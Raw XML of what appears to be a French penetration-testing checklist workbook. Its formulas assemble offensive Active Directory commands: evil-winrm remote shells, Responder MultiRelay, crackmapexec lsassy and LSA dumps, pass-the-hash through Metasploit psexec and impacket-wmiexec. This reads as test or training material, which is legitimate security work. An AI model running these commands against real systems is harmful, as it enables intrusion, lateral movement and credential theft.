      <c r="B35" t="s">
        <v>53</v>
      </c>
      <c r="C35" t="s">
        <v>57</v>
      </c>
      <c r="D35" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="36" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A36" t="s">
        <v>56</v>
      </c>
      <c r="B36" t="s">
        <v>53</v>
      </c>
      <c r="C36" t="s">
        <v>60</v>
      </c>
      <c r="D36" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="37" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A37" t="s">
        <v>56</v>
      </c>
      <c r="B37" t="s">
        <v>53</v>
      </c>
      <c r="C37" t="s">
        <v>62</v>
      </c>
      <c r="D37" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="38" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A38" t="s">
        <v>64</v>
      </c>
      <c r="B38" t="s">
        <v>53</v>
      </c>
      <c r="C38" t="s">
        <v>65</v>
      </c>
      <c r="D38" t="str">
        <f>"evil-winrm -i "&amp;IP&amp;" -u "&amp;user&amp;" -p "&amp;password&amp;""</f>
        <v>evil-winrm -i IP -u user -p password</v>
      </c>
      <c r="E38" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="39" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A39" t="s">
        <v>64</v>
      </c>
      <c r="B39" t="s">
        <v>53</v>
      </c>
      <c r="C39" t="s">
        <v>67</v>
      </c>
      <c r="D39" t="str">
        <f>"evil-winrm -i "&amp;IP&amp;" -u "&amp;user&amp;" -p "&amp;password&amp;" -e &lt;command to execute&gt;"</f>
        <v>evil-winrm -i IP -u user -p password -e &lt;command to execute&gt;</v>
      </c>
      <c r="E39" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="40" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A40" t="s">
        <v>64</v>
      </c>
      <c r="B40" t="s">
        <v>53</v>
      </c>
      <c r="C40" t="s">
        <v>68</v>
      </c>
      <c r="D40" t="str">
        <f>"evil-winrm -i "&amp;IP&amp;" -u "&amp;user&amp;" -p "&amp;password&amp;" -s &lt;source_file&gt; -d &lt;destination_directory&gt;"</f>
        <v>evil-winrm -i IP -u user -p password -s &lt;source_file&gt; -d &lt;destination_directory&gt;</v>
      </c>
      <c r="E40" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="41" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A41" t="s">
        <v>64</v>
      </c>
      <c r="B41" t="s">
        <v>53</v>
      </c>
      <c r="C41" t="s">
        <v>69</v>
      </c>
      <c r="D41" t="str">
        <f>"evil-winrm -i "&amp;IP&amp;" -u "&amp;user&amp;" -p "&amp;password&amp;" -g &lt;source_file&gt; -d &lt;destination_directory&gt;"</f>
        <v>evil-winrm -i IP -u user -p password -g &lt;source_file&gt; -d &lt;destination_directory&gt;</v>
      </c>
      <c r="E41" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="42" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A42" t="s">
        <v>64</v>
      </c>
      <c r="B42" t="s">
        <v>53</v>
      </c>
      <c r="C42" t="s">
        <v>70</v>
      </c>
      <c r="D42" t="str">
        <f>"evil-winrm -i "&amp;IP&amp;" -u "&amp;user&amp;" -p "&amp;password&amp;" -s &lt;powershell_script.ps1&gt;"</f>
        <v>evil-winrm -i IP -u user -p password -s &lt;powershell_script.ps1&gt;</v>
      </c>
      <c r="E42" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="43" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A43" t="s">
        <v>71</v>
      </c>
      <c r="B43" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="44" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A44" t="s">
        <v>72</v>
      </c>
      <c r="B44" t="s">
        <v>53</v>
      </c>
      <c r="C44" t="s">
        <v>73</v>
      </c>
    </row>
    <row r="45" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A45" t="s">
        <v>74</v>
      </c>
      <c r="B45" t="s">
        <v>53</v>
      </c>
      <c r="D45" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="46" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A46" t="s">
        <v>74</v>
      </c>
      <c r="B46" t="s">
        <v>53</v>
      </c>
      <c r="D46" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="47" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A47" t="s">
        <v>74</v>
      </c>
      <c r="B47" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="48" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A48" t="s">
        <v>74</v>
      </c>
      <c r="B48" t="s">
        <v>53</v>
      </c>
      <c r="C48" t="s">
        <v>77</v>
      </c>
      <c r="D48" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A49" t="s">
        <v>74</v>
      </c>
      <c r="B49" t="s">
        <v>53</v>
      </c>
      <c r="C49" t="s">
        <v>79</v>
      </c>
      <c r="D49" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A50" t="s">
        <v>74</v>
      </c>
      <c r="B50" t="s">
        <v>53</v>
      </c>
      <c r="C50" t="s">
        <v>81</v>
      </c>
      <c r="D50" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A51" t="s">
        <v>74</v>
      </c>
      <c r="B51" t="s">
        <v>53</v>
      </c>
      <c r="C51" t="s">
        <v>81</v>
      </c>
      <c r="D51" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.25">
      <c r="B52" t="s">
        <v>53</v>
      </c>
      <c r="C52" t="s">
        <v>84</v>
      </c>
      <c r="D52" t="s">
        <v>85</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.25">
      <c r="B53" t="s">
        <v>53</v>
      </c>
      <c r="C53" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.25">
      <c r="B54" t="s">
        <v>53</v>
      </c>
      <c r="C54" t="s">
        <v>87</v>
      </c>
      <c r="D54" t="s">
        <v>88</v>
      </c>
      <c r="E54" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.25">
      <c r="B55" t="s">
        <v>53</v>
      </c>
      <c r="C55" t="s">
        <v>90</v>
      </c>
      <c r="D55" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.25">
      <c r="B56" t="s">
        <v>53</v>
      </c>
      <c r="C56" t="s">
        <v>92</v>
      </c>
      <c r="D56" s="8" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A57" t="s">
        <v>94</v>
      </c>
      <c r="B57" t="s">
        <v>53</v>
      </c>
      <c r="C57" t="s">
        <v>95</v>
      </c>
      <c r="D57" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A58" t="s">
        <v>94</v>
      </c>
      <c r="B58" t="s">
        <v>53</v>
      </c>
      <c r="C58" t="s">
        <v>97</v>
      </c>
      <c r="D58" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A59" t="s">
        <v>94</v>
      </c>
      <c r="B59" s="6"/>
      <c r="C59" s="6" t="s">
        <v>99</v>
      </c>
      <c r="D59" s="6" t="s">
        <v>100</v>
      </c>
      <c r="E59" s="6"/>
      <c r="F59" s="6"/>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A60" t="s">
        <v>101</v>
      </c>
      <c r="B60" t="s">
        <v>53</v>
      </c>
      <c r="C60" t="s">
        <v>102</v>
      </c>
      <c r="D60" t="str">
        <f>"./RunFiger.py -g -i "&amp;subnet&amp;""</f>
        <v>./RunFiger.py -g -i subnet</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A61" t="s">
        <v>103</v>
      </c>
      <c r="B61" t="s">
        <v>53</v>
      </c>
      <c r="C61" t="s">
        <v>104</v>
      </c>
      <c r="D61" t="str">
        <f>"./MultiRelay.py -t "&amp;IP&amp;" -u ALL"</f>
        <v>./MultiRelay.py -t IP -u ALL</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A62" t="s">
        <v>103</v>
      </c>
      <c r="B62" t="s">
        <v>53</v>
      </c>
      <c r="C62" t="s">
        <v>105</v>
      </c>
      <c r="D62" t="str">
        <f>"./MultiRelay.py -t "&amp;IP&amp;" -u ALL -c &lt;commande&gt;"</f>
        <v>./MultiRelay.py -t IP -u ALL -c &lt;commande&gt;</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A63" t="s">
        <v>103</v>
      </c>
      <c r="B63" t="s">
        <v>53</v>
      </c>
      <c r="C63" t="s">
        <v>106</v>
      </c>
      <c r="D63" t="str">
        <f>"./MultiRelay.py -t "&amp;IP&amp;" -u ALL -d"</f>
        <v>./MultiRelay.py -t IP -u ALL -d</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A64" t="s">
        <v>107</v>
      </c>
      <c r="B64" t="s">
        <v>53</v>
      </c>
      <c r="C64" t="s">
        <v>108</v>
      </c>
      <c r="D64" t="str">
        <f>"crackmapexec smb -u "&amp;user&amp;" -p "&amp;password&amp;" -d "&amp;domain&amp;" "&amp;hostname&amp;"."&amp;domain&amp;" -M lsassy"</f>
        <v>crackmapexec smb -u user -p password -d domain hostname.domain -M lsassy</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A65" t="s">
        <v>107</v>
      </c>
      <c r="B65" t="s">
        <v>53</v>
      </c>
      <c r="D65" t="str">
        <f>"crackmapexec smb -u "&amp;user&amp;" -p "&amp;password&amp;" -d "&amp;domain&amp;" "&amp;hostname&amp;"."&amp;domain&amp;" --lsa"</f>
        <v>crackmapexec smb -u user -p password -d domain hostname.domain --lsa</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A66" t="s">
        <v>107</v>
      </c>
      <c r="B66" t="s">
        <v>53</v>
      </c>
      <c r="D66" t="str">
        <f>"crackmapexec smb -u "&amp;user&amp;" -H "&amp;hash&amp;" -d "&amp;domain&amp;" "&amp;hostname&amp;"."&amp;domain&amp;""</f>
        <v>crackmapexec smb -u user -H hash -d domain hostname.domain</v>
      </c>
      <c r="E66" t="s">
        <v>109</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A67" t="s">
        <v>107</v>
      </c>
      <c r="B67" t="s">
        <v>53</v>
      </c>
      <c r="D67" t="str">
        <f>"crackmapexec smb -u "&amp;user&amp;" -H "&amp;hash&amp;" -d "&amp;domain&amp;" "&amp;hostname&amp;"."&amp;domain&amp;" -x &lt;commande&gt;"</f>
        <v>crackmapexec smb -u user -H hash -d domain hostname.domain -x &lt;commande&gt;</v>
      </c>
    </row>
    <row r="68" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A68" t="s">
        <v>107</v>
      </c>
      <c r="B68" t="s">
        <v>53</v>
      </c>
      <c r="D68" t="str">
        <f>"crackmapexec smb -u "&amp;user&amp;" -H "&amp;hash&amp;" -d "&amp;domain&amp;" "&amp;hostname&amp;"."&amp;domain&amp;" --shares"</f>
        <v>crackmapexec smb -u user -H hash -d domain hostname.domain --shares</v>
      </c>
    </row>
    <row r="69" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A69" s="5"/>
      <c r="B69" s="5"/>
      <c r="C69" s="5"/>
      <c r="D69" s="5"/>
      <c r="E69" s="5"/>
      <c r="F69" s="5"/>
      <c r="G69" s="7"/>
      <c r="H69" s="7"/>
    </row>
    <row r="70" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A70" s="5"/>
      <c r="B70" s="5"/>
      <c r="C70" s="5"/>
      <c r="D70" s="5"/>
      <c r="E70" s="5"/>
      <c r="F70" s="5"/>
      <c r="G70" s="7"/>
      <c r="H70" s="7"/>
    </row>
    <row r="71" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A71" s="5"/>
      <c r="B71" s="5"/>
      <c r="C71" s="5"/>
      <c r="D71" s="5"/>
      <c r="E71" s="5"/>
      <c r="F71" s="5"/>
      <c r="G71" s="7"/>
      <c r="H71" s="7"/>
    </row>
    <row r="72" spans="1:8" ht="105" x14ac:dyDescent="0.25">
      <c r="A72" t="s">
        <v>110</v>
      </c>
      <c r="B72" t="s">
        <v>111</v>
      </c>
      <c r="C72" t="s">
        <v>112</v>
      </c>
      <c r="D72" s="1" t="str">
        <f>"msfconsole
use exploit/windows/smb/psexec
set RHOSTS "&amp;hostname&amp;"
set SMBDomain "&amp;domain&amp;"
set SMBUSER "&amp;user&amp;"
set SMBPASS 00000000000000000000000000000000:"&amp;hash&amp;"
run"</f>
        <v>msfconsole
use exploit/windows/smb/psexec
set RHOSTS hostname
set SMBDomain domain
set SMBUSER user
set SMBPASS 00000000000000000000000000000000:hash
run</v>
      </c>
    </row>
    <row r="73" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A73" t="s">
        <v>113</v>
      </c>
      <c r="B73" t="s">
        <v>111</v>
      </c>
      <c r="C73" t="s">
        <v>114</v>
      </c>
      <c r="D73" t="str">
        <f>"impacket-wmiexec -hashes 00000000000000000000000000000000:"&amp;hash&amp;" "&amp;user&amp;"@"&amp;hostname&amp;"."&amp;domain&amp;""</f>
        <v>impacket-wmiexec -hashes 00000000000000000000000000000000:hash user@hostname.domain</v>
      </c>
    </row>
    <row r="74" spans="1:8" ht="30" x14ac:dyDescent="0.25">
      <c r="A74" t="s">
        <v>64</v>
      </c>
      <c r="B74" t="s">
        <v>111</v>
      </c>
      <c r="C74" t="s">
        <v>115</v>
      </c>
      <c r="D74" s="1" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="75" spans="1:8" ht="30" x14ac:dyDescent="0.25">
      <c r="A75" t="s">
        <v>117</v>
      </c>
      <c r="B75" t="s">
        <v>111</v>
      </c>
      <c r="C75" t="s">
        <v>118</v>
      </c>
      <c r="D75" s="1" t="s">
        <v>116</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="2" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="E7" r:id="rId1" xr:uid="{C99FC8C9-B4F3-44B6-A413-98C0A0EBA2CC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362D-1934-4F92-91A3-4CE0C0F9938E}">
  <sheetPr>
    <tabColor theme="4" tint="-0.249977111117893"/>
  </sheetPr>
  <dimension ref="A1:A4"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C11" sqref="C11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A4" s="2" t="s">
        <v>120</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="A4" r:id="rId1" xr:uid="{1F8953A5-ECE6-47D2-92B2-B0EFB521C3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3599-FA9F-4903-ABE1-A640BB74D670}">
  <sheetPr>
    <tabColor theme="4"/>
  </sheetPr>
  <dimension ref="A1:I1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="C2" sqref="C2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="28.28515625" customWidth="1"/>
    <col min="2" max="3" width="25.85546875" customWidth="1"/>
    <col min="4" max="4" width="28.5703125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="31.140625" customWidth="1"/>
    <col min="8" max="8" width="22.140625" customWidth="1"/>
    <col min="9" max="9" width="38.85546875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A1" s="9" t="s">
        <v>121</v>
      </c>
      <c r="B1" s="9" t="s">
        <v>122</v>
      </c>
      <c r="C1" s="9" t="s">
        <v>165</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>164</v>
      </c>
      <c r="G1" s="9" t="s">
        <v>163</v>
      </c>
      <c r="H1" s="9" t="s">
        <v>123</v>
      </c>
      <c r="I1" s="9" t="s">
        <v>124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481-D6CB-48EA-B4EF-DA81217C86D4}">
  <dimension ref="A1:B10"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A14" sqref="A14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="51.5703125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="61.28515625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>125</v>
      </c>
      <c r="B1" t="s">
        <v>126</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" s="2" t="s">
        <v>127</v>
      </c>
      <c r="B2" t="s">
        <v>128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131</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A6" s="2" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>134</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" s="2" t="s">
        <v>135</v>
      </c>
      <c r="B8" t="s">
        <v>136</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" s="2" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A10" s="2" t="s">
        <v>138</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="A2" r:id="rId1" xr:uid="{63CD326D-6620-4FBB-A52E-ED34E385D98B}"/>
    <hyperlink ref="A9" r:id="rId2" xr:uid="{6E10EA0B-9D9D-4D26-B195-5C7D90AAE290}"/>
    <hyperlink ref="A10" r:id="rId3" xr:uid="{0358CD51-C5B8-4FF2-AAA0-A81F5E4CE381}"/>
    <hyperlink ref="A6" r:id="rId4" xr:uid="{C6C03E4C-38F9-4076-8CB8-A83DC7C9E309}"/>
    <hyperlink ref="A8" r:id="rId5" xr:uid="{5BCF5012-1459-413D-8117-712FC1AFA3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7F44-463A-4DDB-85E1-0F376A58AD50}">
  <sheetPr>
    <tabColor theme="9"/>
  </sheetPr>
  <dimension ref="A1:A9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22.42578125" bestFit="1" customWidth="1"/>
  </cols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8" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A9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4F8-C2CF-42D0-AB0C-FA6F13BEED17}">
  <sheetPr>
    <tabColor theme="9"/>
  </sheetPr>
  <dimension ref="A1:C16"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B16" sqref="B16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>145</v>
      </c>
      <c r="B1" t="s">
        <v>146</v>
      </c>
      <c r="C1" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>148</v>
      </c>
      <c r="B2" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>149</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>150</v>
      </c>
      <c r="B4" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>151</v>
      </c>
      <c r="B5" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>152</v>
      </c>
      <c r="B6" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>153</v>
      </c>
      <c r="B7" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>154</v>
      </c>
      <c r="B8" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>155</v>
      </c>
      <c r="B9" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>156</v>
      </c>
      <c r="B10" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A11" t="s">
        <v>157</v>
      </c>
      <c r="B11" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>158</v>
      </c>
      <c r="B12" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A13" t="s">
        <v>159</v>
      </c>
      <c r="B13" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A14" t="s">
        <v>160</v>
      </c>
      <c r="B14" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A15" t="s">
        <v>161</v>
      </c>
      <c r="B15" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A16" t="s">
        <v>162</v>
      </c>
      <c r="B16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16</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="22" baseType="lpstr">
      <vt:lpstr>road-map-network</vt:lpstr>
      <vt:lpstr>road-map-wifi</vt:lpstr>
      <vt:lpstr>suivi-test</vt:lpstr>
      <vt:lpstr>Sites-Web</vt:lpstr>
      <vt:lpstr>Feuil1</vt:lpstr>
      <vt:lpstr>Allias</vt:lpstr>
      <vt:lpstr>DNS_IP</vt:lpstr>
      <vt:lpstr>domain</vt:lpstr>
      <vt:lpstr>domain_IP</vt:lpstr>
      <vt:lpstr>hash</vt:lpstr>
      <vt:lpstr>hostname</vt:lpstr>
      <vt:lpstr>interface</vt:lpstr>
      <vt:lpstr>IP</vt:lpstr>
      <vt:lpstr>list_domain</vt:lpstr>
      <vt:lpstr>list_hash</vt:lpstr>
      <vt:lpstr>list_IP</vt:lpstr>
      <vt:lpstr>list_password</vt:lpstr>
      <vt:lpstr>list_user</vt:lpstr>
      <vt:lpstr>list_users</vt:lpstr>
      <vt:lpstr>password</vt:lpstr>
      <vt:lpstr>subnet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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>AndromedaTech Formation</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-23T13:04:20Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>